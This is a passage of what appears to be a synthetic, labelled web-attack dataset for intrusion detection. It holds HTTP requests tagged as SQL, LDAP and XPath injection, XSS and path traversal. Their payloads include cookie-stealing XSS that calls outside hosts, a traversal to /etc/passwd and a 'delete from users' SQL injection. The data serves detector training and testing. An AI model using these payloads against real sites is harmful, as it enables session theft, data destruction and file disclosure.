Referer: http://nh5gmtei.gov/LeOs.php
TE: chunked;q=0.0,chunked,trailers
Trailer: Trailer
User-Agent: naise46yrhlvAtj5er
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: vecj/8.8, yebd/9.0, jn0/6.9, OasdIr/4.2
Warning: 952 www.hhNewo.css "1l2t" "Sun, 16 Oct 05 14:27:34 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tRedsa8arsI2=Ecco&11enseV2o=nnconnect&Ae1d3sMnluttuP=50189&hG3HCr_yW=612901&9wg=brmeaY&3iSlocationmG4ZK%uusr=55568198&5i2Ezoc=%7Eautoexecus&@aaWeBA=o7p34q&knC3m=hz%40hN-wT&s8rEds6nd9=iti%29&cZ6cjuiLsc=j5yTta-_&i8EtrhstwGeazod=tgih&snr=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html

End - Id: 46103
Start - Id: 38787
class: LdapInjection
GET /syZETKWw/iginE2lX8Ng@lv/deleteyLSTiU51passwd/eBs/l9_Z/aypNazQ75bYsB/aBlU3QD2tpwBs2/BHVXcwIT/u7zusybera/ae53krevv65.nsf?7t9hsv=7804&-x.bgsoundKdBD=wherein3xieadit6dE&9i0eiiuktaeese=%7Crmochad3unlgwinntwget%25r+e6O7%24&heoN=rCFOaebao&br=s+9m%7Co++ny&.divtKa_QcCrJ=aei07iaai&hrrrg=140%29%28%26%28objectClass%3Ders%29%28%7C%28sn+++%3D+++nn8%29%28cn%3DE+J*%29%29&wesmchrj8aeEYe=sra%3F%2Bs%22daetiA%7Ej%22qe&ntix=ja0..V&esc=tHKTmK4&ooy8IaTes7jlOe=tt1lz+Nf-syi9iOee%3D&ok=stapihmefmo HTTP/1.0
Host: 114.151.92.235
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1253;q=0.4, x-mac-japanese;q=0.3, euc-cn
Accept-Encoding: *;q=0.9
Accept-Language: To-trhfto;q=0.8
Cache-Control: only-if-cached
Client-ip: 103.114.5.31
Cookie: ra5eethod1nw=lBa;Nor-giUgR@autoexec=81080648;Iuis3=dSyKw@Ss88z;Oa6aioi=92;ovEmaMsrtdihcep=ryI
Cookie2: $Version="919"
Date: Wed, 27 Feb 08 23:07:06 UTC
ETag: "IBtj26H_ux12tRgi"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sun, 20 Jun 04 06:50:01 CET
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic dGVoYTpxMmNjaA==
Range: 777808-9828,-9730,-076
Referer: http://8ncirac.de/7p0z.gif
TE: trailers
Trailer: Upgrade
User-Agent: mNtbeetdst (vSxNSmGLz; fuDgmQ; rf6_.Hap; sD2_TVc; o24RZht6B)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: tdie/0.5 81.206.33.117
Transfer-Encoding: compress
Upgrade: cjw/0.8, roll/0.1, tytuee/5.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38787
Start - Id: 35570
class: XPathInjection
POST /eahey/9reo8gjugnne/knqsmxemes/ibbMARNdjy0mNDidyCC/lpGpR1HyWXnAAQ/UNU2JOll2kQI/ssqdnutmhec5so/5WlinkcQ.php4? HTTP/1.1
Content-Length: 481
Content-Language: ary4rq,t7danepe
Content-Encoding: identity
Content-Location: /Oeetw/gietyeH/3wtkis/3bd2e.asmx
Content-MD5: ZWUxc1RzZW1vRGZ0aWUwcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Jan 05 07:00:56 CET
Last-Modified: Wed, 12 Sep 07 06:52:20 GMT
Host: 128.39.163.214
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.1, windows-1258;q=0.2, x-mac-chinesesimp, windows-874;q=0.8
Accept-Encoding: compress;q=0.6
Accept-Language: *
Cache-Control: hIoov='irOwd2dl'
Cookie2: $Version="84"
Date: Sun, 27 Feb 05 18:36:44 UTC
Expect: n4hotni
From: Cyogw@iHT4nAcE.st
If-Modified-Since: Wed, 29 Nov 06 17:35:54 CET
If-Unmodified-Since: Mon, 18 Jul 05 18:38:03 CET
If-Match: "eD7nu93RjtJS-F9z5qF"
If-Range: "FgdN5eUc4Q-yS@HkQ"
Max-Forwards: 5635
Pragma: no-cache
Proxy-Authorization: Digest username="bl3Rnxui"
Authorization: NTLM bW9ldHN2cmUwc0lzbXJtYXpyY2Flcm56b2V0OWVEbkxyRXNUY0F4
Referer: http://www.3shsy1ul.de/reli.pl
TE: gzip;q=0.3,trailers,deflate
Trailer: Accept
User-Agent: gn4r00rdja4rho
UA-CPU: Sparc
UA-Disp: 6739,3427,32
UA-Color: color8
UA-Pixels: 101x5961
Via: HTTP/5.3 82.174.101.132, FTP/3.4 www.aSaa8.js:8
Warning: 503 www.2ereIoft.tiff "stHrxpgsdfyTd3soor" 
----: ------------------------------------------

dtat=rq<=sesei&&ti3qrhter5pa==lkjnrsAa/egehp&eoete=49175022&@Umetal2DLgp=noeocsu'     or     (i    <     count(emcs/child::text())    and  j   <    count(egorq/child::comment()) and   k     < count(tfrrea/child::*) )    or 'er5ar'    =' sat'   or&neautjet=sgWepqger6teOte&flfaIia=ift&trialosrpeao=owmGToK_&tu=eheicsfscgeS0rliu8&0a8orct1lu=7costyle2&adminopt8open.styleCP=piwindow.openil ke]oad:l@&hgstu=1o

End - Id: 35570
Start - Id: 48159
class: XSS
GET /r5autoexecW1/e8a8drjNRaB.jpg?dshlaqwV=rebv&tphSlnern=qbeohno&ttartneohtWis=l0dg&opsnauTmnup1n=1445934&argpwmr7aiezr5i=s1QZsuqEOcQZ&nlpmgr=H%5Cs%3Ee&Kchildsamwhere5xx2.GR7=%3Cdiv+++style++%3D++++%22+background-image%3A++++url%28javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F158.143.160.57%2Felll.msf%27%2Bdocument.cookie%29%3B%5D%29%3B++++%22+++%3E HTTP/1.0
Host: www.faklvrxhc.ch
Connection: keep-alive
Accept: audio/*;q=0.7, image/gif, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: briLd-rpnu, et-i, 1seyrbf-H8taddfe;q=0.6, adNaa-mTu;q=0.9
Cache-Control: min-fresh=27
Client-ip: 211.190.214.99
Cookie: gsMCeEi=whQ;huqlts7srHavcn=w1G;Laccess_logK-x4=btt;uu;ng;gty8YdOvjAnF=nnhivq5;9gDLBHacceptBP=/hhl6zofjo0EcsD
Cookie2: $Version="37"
Date: Tue, 25 Dec 07 22:48:19 UTC
ETag: W/"KTjmOB4QF.aHd_v"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Sat, 13 May 06 06:12:11 GMT
If-Unmodified-Since: Thu, 11 Dec 08 02:52:15 UTC
If-Match: "4EKvulqZiW8Zkn@"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.0
Pragma: lCbhoBeh=asresse
Authorization: Digest algorithm=MD5-sess
Range: 248-
Referer: http://www.iinIive.com/31m2ot1.php4
TE: gzip,gzip;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 3.5; tl-ie; rv:9.7.4) Gecko/71143705
UA-CPU: MIPS
UA-Disp: 1387,690,8
UA-OS: Win98
UA-Color: color8
Via: 2.5 www.atpuSicc.jpg
Transfer-Encoding: grg3ro
Warning: 469 www.eeshc.gif:6 "8tbhssqusptoj" 
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48159
Start - Id: 42499
class: SqlInjection
GET /hZTfgKPc4lT/3oLzkpkq0vjIOEls/nU1HOzL422R/DieawplnhEyoseima/runlZDjEbQ.msf?in=%27select+customer_phone+++++%27%7C%7C%27from+++customers+++++%27%7C%7C%27where++++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++and+customer_type%3D1%27%3B HTTP/1.0
Host: www.izeaihnsia.net:80
Connection: close
Accept: image/*, image/gif;q=0.6
Accept-Charset: iso-8859-9;q=0.2, cp-932;q=0.2, iso-2022-kr;q=0.4
Accept-Encoding: identity;q=0.8, identity;q=0.2
Accept-Language: u9r0-eteyh, ayeeb-thlyne;q=0.6
Cache-Control: max-age=88995
Client-ip: 196.189.248.125
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="45"
Date: Wed, 20 Feb 08 04:40:44 GMT
ETag: W/"R_iyxOFyTu-4qGue"
Expect: eb8e
From: sheo@RafNi.uk
If-Modified-Since: Wed, 16 Jul 08 13:46:05 CET
If-Unmodified-Since: Fri, 20 Jun 08 08:02:42 GMT
If-Match: "z3ouFUbDR7fBnx6a"
If-None-Match: "3XiRonkAkr4ovqs"
If-Range: "P4jQsI-mzmPyjr51"
Max-Forwards: 3
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest username="3eaeogs"
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: -33
Referer: /yrrti/artjslE/rrni6lt.cgi
TE: gzip;q=0.7,trailers
Trailer: Authorization
User-Agent: E9maRda (t6DMm8Z; a0nK1K; iYcd8KGTP; sNFDXVQp; uWF1QPV)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 5.3 11.222.87.252, 4.3 151.61.44.116
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 029543372781579317
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42499
Start - Id: 47179
class: XSS
GET /ot/n8Iok1D30/0BzvIOVum/yRRKy1QIPSo0/x3omGpw_al@CCY0aHN/aean9cier1ohsioBdf/Tgexda69imiFamtehio/DQniV/eBCnP_O/8Ejrn8wBhoYsraari/thhniexg5.tiff?cEggsetlpac=uk4.AP&hbNtbbsoa=3&W%uRah.netcat=%3Ca++href+++%3D++%22+++about%3A%3Cs%26%2399%3Bript++++%3E%5Bwindow.open%28%27http%3A%2F%2F38.35.7.26%2Fndolla.php3%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E+++%22+++%3E&rySFn3e=8349738&Or1asas=e6issnh6n HTTP/1.0
Host: www.aC1m.biz
Connection: eayid
Accept: */*
Accept-Charset: windows-1254;q=0.1, x-mac-greek;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: toa1-e;q=0.4, saibT-osboqsq;q=0.6, mOuqha-t;q=0.8, nEoao-sssea;q=0.9
Cache-Control: no-store
Client-ip: 102.236.20.245
Cookie: 4ta7oC=0
Cookie2: $Version="93"
Date: Sat, 05 Jun 04 20:15:58 CET
ETag: "mosfK1Kq7WDVNdG"
Expect: bltUcf=Sn6ay
From: atrc@mosrloac8i.net
If-Modified-Since: Mon, 05 Jun 06 14:53:18 UTC
If-Unmodified-Since: Fri, 14 Nov 08 23:34:28 CET
If-Match: "LyXjNLNlagO32.NnIq-g"
If-None-Match: "4Cg3kkeQXLS@LRX-ixQZ"
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 691
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM ZmxlaU5BM2V0cnJ1YW1vY210aWV0cnRRb3J6c250bm95dFZhVGhjaHU=
Range: 80-60466,-60,-277
Referer: http://matams.uk/yitAbv.txt
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.2 (Windows; U; Win 9x 5.6; ws-ef; rv:1.5.7) Gecko/43022171
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/4.8 133.249.49.146, 2.4 80.182.203.243:60, HTTP/7.4 156.97.43.204
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 861 174.187.41.2 "rTsfbeu" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47179
Start - Id: 37178
class: LdapInjection
GET /tr7/nseczE/gpahleaia/i7WRk0HE@I@qgf/rcptpasswdGRLPa4bin_libr0Q/dmee/uL/oBlocation09window.openS/yMAM6k2/zQPHK-iyy/Cm5.css?lutejxns9r=28121626&h3m85ew=%29%28++%7C+%28ibs%3Dswtx*%29&eheicbo=6710881&IYcPG=stdinlq4usad6ud&alrzptem2e=tlIeie%3Devalrt%25of&tmrakhsa=hmmof&wsAbkrt=bTEKTj3G8Cu&haotkbrfehfq=dB%2Fntelnetl+rnsCicsrcpus HTTP/1.1
Host: www.nuoopnnr.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.8
Accept-Encoding: gzip
Accept-Language: to-othr9i, dcaHLlm-o3Tomus
Cache-Control: no-store
Client-ip: 105.61.31.124
Cookie: itHDspcrdafb=zsl
Cookie2: $Version="6"
Date: Sun, 10 Sep 06 02:06:03 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: aheoexc5@cnna.gov
If-Modified-Since: Sat, 11 Dec 04 09:30:21 CET
If-Unmodified-Since: Fri, 09 Oct 09 21:24:31 CET
If-Match: *
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest username="fttllaoe"
Authorization: Digest qop=auth
Range: 0-
Referer: http://1naNides.biz/1a1l/eaawn7nb/enoeers.jpeg
TE: deflate,deflate,chunked;q=0.8
Trailer: Via
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 6.6; rt-dc; rv:9.1.7) Gecko/61951619
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: deflate
Upgrade: vtLqpc/5.6, rwtot/2.1, ahfxu/1.7, se1/6.7
Warning: 419 www.oe4ei.jpeg "oeecaegei0asnitnozib" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 175208593
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37178
Start - Id: 49376
class: XPathInjection
GET /nt/cgGtOflk/2XW-GOgTBrk/RQG9NnCwQ/6XlMw4kjT/notBeyeO5itweS7drev/QAEZ8I/hpnph-E3iframe_U/1Kbin2ZGfO@dnph-C0/lnY3pQH2s9Ect.shtml?tnt1e=kaHe6an&bmer=eee&eeRitf=t&XoitIcNt=762++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++44978%3D&rwoodhebac=32029532&ehtusudnasite7i=tz5dropzrcdfixin%40o&Bw6MGSY1eU=711&rr=72255475&mde3a=c5gFnX1Qid&9ec6Jx=migoslgyakRsnoph HTTP/1.0
Host: 164.113.239.172
Connection: 2inr
Accept: */*;q=0.3
Accept-Charset: windows-1258
Accept-Encoding: gzip;q=0.2, identity;q=0.6, gzip;q=0.5, identity;q=0.2, identity
Accept-Language: Lnhear-U, rf-jvce;q=0.4
Cache-Control: only-if-cached
Client-ip: 242.216.253.161
Cookie: vT12=eao;1rdmihelR=skUtfOcTg
Cookie2: $Version="951"
Date: Mon, 27 Sep 04 17:55:17 GMT
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: mty5e=eh9oea;ie4est=etebu
From: otln@tpiaietAi5.st
If-Modified-Since: Fri, 06 Oct 06 12:11:39 UTC
If-Unmodified-Since: Sat, 01 Oct 05 19:01:41 CET
If-Match: *
If-None-Match: "M1MpuoxosCLLPZJ7y"
If-Range: Wed, 22 Jul 09 15:38:40 CET
Max-Forwards: 4
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: Basic YWhvM2p1c2w6c2JjZ3Ew
Range: 79-,-25900
Referer: http://www.cnSwj.org/taiw8hab/Ssat4bn/adntme/lrircrau/Eaheit.mspx
TE: chunked
Trailer: Pragma
User-Agent: 2ytNMev9
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0695x2392
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 392 www.dbtno.css:44727 "hesiano" "Sat, 28 Jan 06 05:38:19 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49376
Start - Id: 49255
class: XPathInjection
GET /83JIo4bu0/m8/gw5BD-LKRhlYjTtL2S/eHaTgTdkOcXW/8aeNuencI/thnerEebYd/idKhgekdcerhfostcxr.php?snwtts1w7eEs8bH=dhsh%27+++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++%27dRm%27%3D+++%27&FWprocessing-instruction6F1=tW&MlDm4q6=d2Dka&eanc=inhbmjgeSRem1&hzuieMt=d-mNsQe&5nsn=066206076&ore7lL=os6r5edhmNeMe&WGGBCgR=ht+&su=1865516&Htocadrdo2oaE=o HTTP/1.0
Host: www.HasShdl9t.biz:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: gb2312;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=8313
Client-ip: 247.83.20.197
Cookie: k4rdkat=cseaWReumt
Cookie2: $Version="9"
Date: Mon, 10 Sep 07 14:38:48 UTC
ETag: "erUlUONCohcJ0qSw"
Expect: fY8a
From: lqie@4vraituc.com
If-Modified-Since: Thu, 24 Jun 04 18:32:30 GMT
If-Unmodified-Since: Mon, 19 Sep 05 08:31:18 UTC
If-Match: "@t8lt4xaei4gXQu"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 5.3
Pragma: a0efsn=4hm
Proxy-Authorization: Digest nonce
Authorization: Mwugt pawsenl=adtnt
Range: 560-83908
Referer: /ooua2r/7i2o.gif
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/2.0 (X11; U; Solaris 6.2; dt-en; rv:7.5.6) Gecko/56715126
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: gzip
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 961 251.147.65.131 "dTe0h" "Thu, 09 Sep 04 22:26:57 UTC"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49255
Start - Id: 38015
class: LdapInjection
GET /ls1Cu-9NMLHX9paAglK/qTKDtmp5l7oTfWa8/aOLwOKAETSFk0@/tuz6rueevrspEksytsec/1ACZ-oBoaLY/emcE/aorucmsrla.jpg?ffWenhlse=4Oj%29%28%26%28objectClass++++%3D++++epT*%29 HTTP/1.1
Host: 155.238.222.108
Connection: keep-alive
Accept: image/gif;q=0.0, video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: avm2-abt3, Vhe-csbytf, enatN-tljeTmee
Cache-Control: min-fresh=3
Client-ip: 204.64.18.91
Cookie: hl9nZrnniyPtl=ftett8htif
Cookie2: $Version="804"
Date: Sat, 26 Jan 08 13:26:10 GMT
ETag: "zGwbkaD56y2_UjA"
Expect: hAenvtnw
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Thu, 14 Jun 07 10:22:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.2
Pragma: dsier=iphxe
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM b2VudUVwaGV0dTRwb2V0Z3RIaW84YXRlZTFybWltaVRyQThvZXRn
Range: 28-,220237-8,8-
Referer: /7ddyctt6/cqHSsee/hitnsv.tiff
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/1.3 (compatible; MSIE 5.4; Unix; ixto; Ybla0oaqi; eeed69)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 905x8185
Via: FTP/4.4 www.le6gn.html, swktd/1.5 www.EW4tetl.jpeg
Transfer-Encoding: identity
Upgrade: obs/0.4, gbr/5.8
Warning: 576 www.4exea.gif "s8oN" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 9679089566014
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38015
Start - Id: 44958
class: PathTransversal
GET /_LffV5YacceptPIG/aEqpwkmqVz_bc/oBv_YvXIA5M21Z7/eehbierdrovmfrRa7/mEkK@GtrmjP2LoDwXP/nnetpynmoeaupwar/pFTaog1bQ/fnNzOKN/tvGw-e4-JAdwd.asp?8XT.OinsertoXv_hz=68844&eB3odlxtei=7vS3Nn1wMmj&1iehztozOieo=doc%28+++++file%3A%2F%2F%2Fc%3A%2Fh3l%2FlroqAst.xml+++++%29 HTTP/1.1
Host: 11.169.38.129
Connection: close
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: gzip;q=0.5, compress;q=0.2, identity;q=0.6, deflate, gzip
Accept-Language: aoznu-a;q=0.6, aoulcy-hlc0carh, yewgem1o-el;q=0.9
Cache-Control: only-if-cached
Client-ip: 132.242.52.39
Cookie: eTAewteixeetwee=nd;das25=erjo;nb@AK8zVH=hasinulujk2;jk3sery1=1412056;atcef6efg5cf=ro5r-dzT;hhaerynci=mwqeti
Cookie2: $Version="66"
Date: Sun, 05 Sep 04 11:32:15 GMT
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Thu, 29 Sep 05 11:41:28 UTC
If-Unmodified-Since: Sun, 30 Jan 05 12:40:37 CET
If-Match: "nT2kxNKXy6spbCN7Fl_Q"
If-None-Match: "sfeSHScfadv2-25T-S"
If-Range: Tue, 31 Oct 06 08:49:28 UTC
Max-Forwards: 4
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: /fWAnp/a1mU/avplRnix/slydgg.bin
TE: trailers,trailers
Trailer: Upgrade
User-Agent: jtldsni/7.9.6
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 298x509
Via: dSS/5.0 184.217.61.230:0321
Transfer-Encoding: identity
Upgrade: nsi/5.0
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44958
Start - Id: 47332
class: XSS
GET /mtlane/jH8PSBnTz-wky4/NlhbcEihp/op0NjWCkKJK-E8Lcg/i1Y@.4HC/fauctfp/etxOLfYPvUI10P3M/lmisoeYneeo/ranMq_Uf8F.hCo6.jpeg?RCBnode=98&nelnrm=%3Cdiv+++onmouseover++%3D+++%22%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.leilin.com%2Fcgi-bin%2Fiengchieis.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E&rawltpcCleb=36055284 HTTP/1.0
Host: 199.121.66.19:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 88.199.53.236
Cookie: w1gt7itt=oirb;bsenao=c33UX;naylb=tRaudd'aenh
Cookie2: $Version="6"
Date: Thu, 07 Jul 05 15:57:24 UTC
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: "OKBJ3kkDpGcd0FL"
If-None-Match: *
If-Range: Fri, 30 Oct 09 23:30:43 UTC
Max-Forwards: 1125
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM aWU4aWFpcHQ0b2c5UjZIaXNpdG5iM3dzMmVyZXBjc2VQcg==
Range: -827060,69-,229-399617
Referer: http://toeln.net/htoNges/tNmbl4tr.bin
TE: deflate;q=0.0,trailers
Trailer: If-Match
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 2.3; ah-gt; rv:9.7.8) Gecko/49708522
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6004x311
Via: 3.3 127.88.135.65, zo1c/0.5 207.196.196.203
Transfer-Encoding: gzip
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 9556709802394
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47332
Start - Id: 41425
class: SqlInjection
PUT /ay/togeljrlwkI/jadtjsedrey/eqa/to4ojnoeyo6qk6/tiyeiwho/_h8whereUkGbxlQU_.nsf? HTTP/1.1
Content-Length: 138
Content-Language: 4oyjnnn,Ui6dant,hNaiT
Content-Encoding: identity
Content-Location: http://iA8Usr.com/snenw5/Ql6edi/ctentA.exe
Content-MD5: aW5zY3Nuc3VyYmVlaWJ0SA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 12:44:36 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: 170.173.89.116
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp, iso-10646-ucs-2;q=0.2, iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=5961
Client-ip: 196.36.129.201
Cookie: _bgsoundokw=5039
Cookie2: $Version="458"
Date: Wed, 04 Jun 08 21:47:15 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
If-Modified-Since: Sat, 25 Sep 04 10:48:35 UTC
If-Unmodified-Since: Thu, 10 Dec 09 15:18:41 UTC
If-Match: "l2ue9yd3wxpNBql1v"
If-None-Match: "zRYCdW.U6j90Ek39"
If-Range: "nhfYEa5epnA9YaC"
Max-Forwards: 35
MIME-Version: 2.2
Pragma: rfnj9='q'
Proxy-Authorization: 5s1k thjftN=9ldw
Authorization: Digest algorithm=MD5-sess
Range: 4509-,62-022408,-4198
Referer: /nba4yqe/gnLeze4/ab67N/fst2yro.mspx
TE: trailers,deflate;q=0.6
Trailer: Date
User-Agent: eXBA9sQms http://www.anhjg.ch
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: 0.7 www.aT8ca4ri.htm
Transfer-Encoding: atams; eeonr=i4etmno
Upgrade: rht/5.4
Warning: 367 www.allm.jpg "DIddrxa" "Wed, 23 Jun 04 20:22:35 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

medwan=63&bodyq3XvE='    );     delete   from users;  commit;   dummy(    '&tamsq=nEhttpsEca+iowindow.open&urrmsayb=trehsl

End - Id: 41425
Start - Id: 37923
class: LdapInjection
